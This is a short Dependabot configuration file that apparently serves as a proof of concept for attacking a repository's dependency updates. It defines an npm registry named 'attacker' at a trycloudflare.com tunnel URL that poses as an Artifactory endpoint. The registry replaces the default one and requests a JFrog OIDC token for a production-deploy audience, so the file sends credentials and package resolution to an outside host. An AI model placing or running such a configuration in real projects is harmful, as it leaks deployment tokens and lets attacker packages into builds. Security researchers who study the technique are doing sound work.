version: 2
registries:
  attacker:
    type: npm-registry
    url: https://louisville-periods-financing-sensors.trycloudflare.com/artifactory/api/npm/npm-probe
    jfrog-oidc-provider-name: anything
    audience: prod-deploy-immutable
    replaces-base: true
updates:
  - package-ecosystem: npm
    directory: "/"
    schedule: { interval: daily }
    registries: [attacker]
